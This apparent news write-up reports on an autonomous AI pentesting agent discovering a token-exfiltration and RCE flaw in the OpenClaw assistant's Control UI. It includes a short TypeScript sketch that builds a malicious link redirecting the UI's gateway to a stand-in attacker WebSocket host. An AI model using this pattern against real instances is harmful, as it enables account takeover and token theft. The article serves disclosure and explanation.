BotBeat
RESEARCH · Ethiack · 2026-02-26

AI Security Tool Discovers Critical Zero-Day Vulnerability in OpenClaw Assistant in Under 2 Hours

Key Takeaways

  • Ethiack's AI pentesting agent Hackian autonomously discovered a CVSS 8.8 zero-day vulnerability in OpenClaw in under 2 hours, leading to a new CVE assignment
  • The vulnerability enables one-click account takeover and remote code execution through authentication token exfiltration via malicious WebSocket connections
  • OpenClaw's rapid adoption following social media hype led to numerous insecurely configured public instances with default settings and exposed ports
Source: Hacker News, https://ethiack.com/news/blog/one-click-rce-openclaw

Summary

Ethiack's autonomous AI pentesting agent, Hackian, identified a critical CVSS 8.8 vulnerability in OpenClaw, an open-source personal AI assistant platform, in approximately 1 hour and 40 minutes. The vulnerability, which has been assigned a CVE identifier, allows one-click account takeover leading to remote code execution (RCE). The flaw lies in OpenClaw's Gateway Control UI, which is enabled by default: when a victim visits an attacker-controlled website, their authentication token is leaked over a WebSocket channel.

The discovery highlights growing security concerns around OpenClaw, which saw rapid adoption after social media hype about its ability to integrate with numerous messaging services and execute tasks with full system access. Security researchers had already raised alarms about the many publicly exposed OpenClaw instances running with default configurations and open ports. The vulnerability's reach goes further still: even locally hosted instances remain exploitable through a cross-site request forgery (CSRF) attack vector.
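The one-click, CSRF-style delivery can be sketched roughly as follows. This is an illustration of the attack class, not OpenClaw's actual attack surface: the UI port and the `gateway` query-parameter name are assumptions made for the example.

```typescript
// Hypothetical sketch of a one-click delivery against a locally hosted
// Control UI. The port (18789) and the "gateway" parameter name are
// illustrative assumptions, not details from the advisory.

// The attacker crafts a link to the victim's own localhost UI. Because
// the victim's browser issues the GET request, binding the UI to
// localhost offers no protection against this vector.
function buildMaliciousLink(uiOrigin: string, attackerGateway: string): string {
  const url = new URL("/", uiOrigin);
  url.searchParams.set("gateway", attackerGateway);
  return url.toString();
}

const link = buildMaliciousLink(
  "http://localhost:18789",     // assumed default UI origin
  "wss://attacker.example/ws",  // attacker-controlled gateway
);
console.log(link);
```

Any channel that gets the victim to click the link, such as a forum post or chat message, completes the delivery step.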

Working entirely autonomously through reconnaissance, source code analysis, and WebSocket examination, Hackian identified that OpenClaw's security relies heavily on client-side logic. The AI agent discovered that URL parameters could override the WebSocket gateway URL via simple GET requests, causing authentication tokens stored in local storage to be exfiltrated to attacker-controlled servers. This research represents a significant milestone in AI-powered security testing, demonstrating that autonomous agents can discover complex, multi-stage vulnerabilities without human intervention.

The findings raise important questions about the security practices surrounding rapidly-deployed AI systems and the potential for AI-versus-AI security dynamics. As personal AI assistants with extensive system access become more popular, the discovery underscores the critical need for rigorous security testing before public deployment, particularly for open-source projects that may be quickly adopted by non-technical users.

  • The attack exploits OpenClaw's default-enabled Gateway Control UI and affects even locally-hosted instances through CSRF techniques
  • This discovery demonstrates AI agents can autonomously identify complex, multi-stage security vulnerabilities through reconnaissance, code analysis, and protocol examination

Editorial Opinion

This research marks a pivotal moment in cybersecurity: an AI successfully hacking another AI system represents both a breakthrough in autonomous security testing and a cautionary tale about the AI deployment race. The fact that Hackian identified a critical vulnerability in OpenClaw—a system designed to have 'full system access'—in less time than a typical work meeting should alarm anyone rushing to deploy AI assistants with elevated privileges. The irony is striking: as we build increasingly capable AI agents to automate our digital lives, we're simultaneously creating AI agents to exploit the security gaps we inevitably leave in our haste to ship.

Tags: AI Agents · Machine Learning · Cybersecurity · AI Safety & Alignment · Open Source
